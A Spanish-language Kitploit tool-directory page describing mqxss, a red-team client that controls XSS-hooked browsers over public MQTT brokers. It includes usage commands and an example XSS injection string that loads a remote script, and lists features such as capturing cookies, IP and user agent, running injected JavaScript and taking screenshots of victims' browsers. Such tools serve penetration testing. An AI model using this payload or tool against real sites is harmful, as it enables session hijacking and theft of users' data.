Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mqxss — Comunicación del navegador enganchado sobre MQTT | Kitploit
Herramientas/GitHubGitHub/grampae/mqxss
Generación de PayloadsExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubgrampae/mqxss

mqxss

Comunicación del navegador enganchado sobre MQTT

Ver Repositorio
83hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

mqxss v0.2

mqxss actúa como un cliente para comunicarse con navegadores enganchados a través de MQTT

Screenshot from 2023-07-03 15-15-35

La ventaja de usar esto en lugar de beef o xsshunter es que, además de alojar el payload js, no hay configuración de infraestructura; puedes usar un broker público (aunque actualmente usa ofuscación, el cifrado está en desarrollo).

Los navegadores enganchados se comunicarán en el tema MQTT del broker que especifiques; hay muchos brokers públicos/gratuitos para probar esto.

El cliente utiliza la librería paho.mqtt de Python, mientras que el payload js utiliza 'mqttws31.min.js', que se obtiene de aquí 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


Instrucciones

Screenshot from 2024-01-17 11-34-59

Para generar un payload JS que enganche navegadores, establece la bandera -g en tiempo de ejecución junto con tus variables de broker, puerto y tema. Al hacerlo, tu payload se creará en la carpeta /js/.

Para ejecutar el cliente, proporciona tu broker, puerto y tema de la siguiente manera

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Descargar herramienta

Para ejecutar el cliente con credenciales, proporciona tu broker, puerto, nombre de usuario, contraseña y tema de la siguiente manera

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Envía tu payload XSS a la víctima mientras el cliente mqxss está en ejecución, ej.: '"><script src=https://example.com/x.js async></script> o algo similar; si es vulnerable, deberías recibir una notificación indicando que el navegador se ha conectado con algunos detalles básicos, incluidas cookies, etc.

a


Características:

  • el payload js utiliza MQTT QoS 1 y Last Will; mqxss será notificado de desconexiones o conexiones que ocurran mientras el cliente no está conectado al broker
  • genera el payload js en tiempo de ejecución para enganchar navegadores
  • actualmente solo funciona con brokers MQTT que usan websockets seguros
  • abre la ubicación del navegador enganchado con las cookies capturadas en el navegador por conveniencia
  • al engancharse, obtiene cookies, IP, tipo de dispositivo y user agent
  • ver navegadores previamente enganchados (desenganchados)
  • enviar js a los navegadores actualmente enganchados y obtener respuesta si está disponible
  • captura de pantalla del navegador enganchado
  • establecer usuario y contraseña para brokers que lo requieran en tiempo de ejecución
  • notificación pushover mediante el establecimiento de las variables ptoken y userkey en mqxss.py y el uso de la bandera de línea de comandos -po